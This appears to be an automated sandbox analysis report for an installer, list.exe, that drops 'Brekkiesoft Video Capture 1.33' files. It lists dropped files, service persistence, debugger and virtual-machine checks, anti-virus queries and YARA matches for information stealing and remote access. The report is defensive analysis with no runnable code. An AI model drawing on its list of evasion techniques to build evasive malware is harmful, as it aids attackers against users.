                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-B9LPS.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-5FBME.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | File created: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe
                    Source: C:\Users\user\Desktop\list.exe | File created: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\LTDIS13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\is-FUIGA.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-KK3F9.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\ltkrn13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | File created: C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-A2HQB.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\sqlite3.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-P0L8V.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcp71.dll (copy)

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 | 6_2_02C0E8A8
                    Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_004016B0 StartServiceCtrlDispatcherA,GlobalFree, | 6_2_004016B0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, | 2_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004241DC IsIconic,SetActiveWindow,SetFocus, | 2_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00424194 IsIconic,SetActiveWindow, | 2_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, | 2_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, | 2_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00417598 IsIconic,GetCapture, | 2_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, | 2_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00417CCE IsIconic,SetWindowPos, | 2_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, | 2_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, | 2_2_0041F118
                    Source: C:\Users\user\Desktop\list.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\list.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, | 6_2_02C0E9AC
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Window / User API: threadDelayed 2518
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Window / User API: threadDelayed 7411
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-0G4JQ.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-1B315.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-B9LPS.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-5FBME.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\LTDIS13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\is-FUIGA.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-KK3F9.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\ltkrn13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-A2HQB.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-P0L8V.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcp71.dll (copy)
                    Source: C:\Users\user\Desktop\list.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_0-5966
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_6-61508
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | API coverage: 2.9 %
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532 | Thread sleep count: 2518 > 30
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532 | Thread sleep time: -5036000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 8180 | Thread sleep time: -1260000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532 | Thread sleep count: 7411 > 30
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe TID: 7532 | Thread sleep time: -14822000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | File opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00452A60 FindFirstFileA,GetLastError, | 2_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, | 2_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, | 2_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, | 2_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose, | 2_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, | 2_2_00463CDC
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, | 0_2_00409B78
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Thread delayed: delay time: 60000
                    Source: list.exe | Binary or memory string: HGfS'
                    Source: svchost.exe, 00000007.00000002.2501968273.000001B996C53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: svchost.exe, 00000007.00000002.2501968273.000001B996C68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000888000.00000004.00000020.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.2501511346.000001B996C00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.2502200656.000001B996C89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.2501968273.000001B996C53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: svchost.exe, 00000007.00000002.2501731481.000001B996C42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000009.00000002.2501623294.000002DC5B02B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\list.exe | API call chain: ExitProcess graph end node | graph_0-6763
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | API call chain: ExitProcess graph end node | graph_6-61116
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep | graph_6-61403
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C13A08 _memset,IsDebuggerPresent, | 6_2_02C13A08
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C1E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, | 6_2_02C1E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 2_2_004502C0
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C05E5F RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection, | 6_2_02C05E5F
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C180E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 6_2_02C180E8
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, | 2_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, | 2_2_0042E09C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C0E860 cpuid | 6_2_02C0E860
                    Source: C:\Users\user\Desktop\list.exe | Code function: GetLocaleInfoA, | 0_2_0040520C
                    Source: C:\Users\user\Desktop\list.exe | Code function: GetLocaleInfoA, | 0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: GetLocaleInfoA, | 2_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: GetLocaleInfoA, | 2_2_004085B4
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, | 2_2_004585C8
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_004026C4 GetSystemTime, | 0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045559C GetUserNameA, | 2_2_0045559C
                    Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00405CF4 GetVersionExA, | 0_2_00405CF4

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                    Source: svchost.exe, 00000008.00000002.2503604982.0000021190102000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000008.00000002.2503604982.0000021190102000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: bsoftvideocapture33.exe PID: 7528, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara matchFile source: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bsoftvideocapture33.exe PID: 7528, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609660FA sqlite3_finalize, sqlite3_free, sqlite3_value_numeric_type, sqlite3_value_numeric_type, sqlite3_value_text, sqlite3_value_int, memcmp, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_strnicmp, sqlite3_mprintf, sqlite3_mprintf, sqlite3_malloc, sqlite3_free, sqlite3_mprintf, sqlite3_prepare_v2, sqlite3_free, sqlite3_bind_value
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6090C1D6 sqlite3_clear_bindings, sqlite3_mutex_enter, sqlite3_mutex_leave
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60963143 sqlite3_stricmp, sqlite3_bind_int64, sqlite3_mutex_leave
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096A2BD sqlite3_bind_int64, sqlite3_step, sqlite3_column_int, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096923E sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step, sqlite3_column_int64, sqlite3_reset, sqlite3_malloc, sqlite3_malloc, sqlite3_step, sqlite3_column_int64, sqlite3_reset, sqlite3_realloc, sqlite3_realloc, sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_free, sqlite3_free, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096A38C sqlite3_bind_int, sqlite3_column_int, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096748C sqlite3_malloc, sqlite3_bind_int, sqlite3_step, sqlite3_column_blob, sqlite3_column_bytes, sqlite3_reset, sqlite3_bind_int, sqlite3_step, sqlite3_column_int64, sqlite3_reset, sqlite3_malloc, sqlite3_bind_int64, sqlite3_column_bytes, sqlite3_column_blob, sqlite3_column_int64, sqlite3_column_int64, sqlite3_column_int64, sqlite3_step, sqlite3_reset, sqlite3_bind_int64, sqlite3_step, sqlite3_column_int, sqlite3_reset, sqlite3_bind_int64, sqlite3_bind_int, sqlite3_step, sqlite3_column_int64, sqlite3_column_int64, sqlite3_column_int64, sqlite3_column_bytes, sqlite3_column_blob, sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_reset, memcmp, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_reset, sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step, sqlite3_column_int, sqlite3_reset, sqlite3_step, sqlite3_column_int64, sqlite3_reset, sqlite3_bind_int64, sqlite3_realloc, sqlite3_column_int, sqlite3_step, sqlite3_reset, sqlite3_bind_int64, sqlite3_bind_int, sqlite3_bind_int, sqlite3_step, sqlite3_reset, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_free, sqlite3_bind_int, sqlite3_bind_blob, sqlite3_step, sqlite3_reset, sqlite3_free, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609254B1 sqlite3_bind_zeroblob, sqlite3_mutex_leave
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094B407 sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_bind_int64, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6090F435 sqlite3_bind_parameter_index
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609255D4 sqlite3_mutex_leave, sqlite3_bind_text16
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609255FF sqlite3_bind_text
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096A5EE sqlite3_value_text, sqlite3_value_bytes, sqlite3_strnicmp, sqlite3_strnicmp, sqlite3_mprintf, sqlite3_prepare_v2, sqlite3_free, sqlite3_malloc, sqlite3_column_int, sqlite3_column_int64, sqlite3_column_text, sqlite3_column_bytes, sqlite3_finalize, sqlite3_step, sqlite3_free, sqlite3_finalize, sqlite3_strnicmp, sqlite3_bind_int, sqlite3_column_int, sqlite3_step, sqlite3_reset, sqlite3_mprintf, sqlite3_prepare_v2, sqlite3_free, sqlite3_column_int64, sqlite3_column_int, sqlite3_column_text, sqlite3_column_bytes, sqlite3_step, sqlite3_finalize, sqlite3_strnicmp, sqlite3_strnicmp, sqlite3_bind_int, sqlite3_bind_int, sqlite3_step, sqlite3_reset, sqlite3_value_int, sqlite3_malloc, sqlite3_bind_null, sqlite3_step, sqlite3_reset, sqlite3_value_int, sqlite3_value_text, sqlite3_value_bytes, sqlite3_free
